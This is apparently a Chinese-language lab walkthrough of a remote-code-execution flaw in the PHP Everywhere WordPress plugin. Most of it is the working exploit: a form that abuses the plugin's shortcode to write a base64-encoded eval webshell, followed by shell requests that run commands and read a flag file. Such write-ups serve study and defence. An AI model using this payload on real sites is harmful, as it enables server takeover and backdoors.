產品簡介#
WordPress 是一款個人部落格系統,並逐步演化成一款內容管理系統軟體,它是使用 PHP 語言和 MySQL 資料庫開發的,使用者可以在支援 PHP 和 MySQL 資料庫的伺服器上使用自己的部落格。
漏洞概述#
任何訂閱者都可以利用該漏洞傳送帶有「短碼」參數設定為 PHP Everywhere 的請求,並在網站上執行任意 PHP 程式碼。
影響範圍#
<= 2.0.3
影響外掛:PHP Everywhere
利用流程#
訪問後台地址:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
帳號:test/test
刪除儀表板下方的內容,瀏覽器 F12,添加一個節點,輸入如下內容:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
然後執行即可(點擊 execute),訪問如下連結:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
頁面返回 200.
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
修復建議#
- 升級版本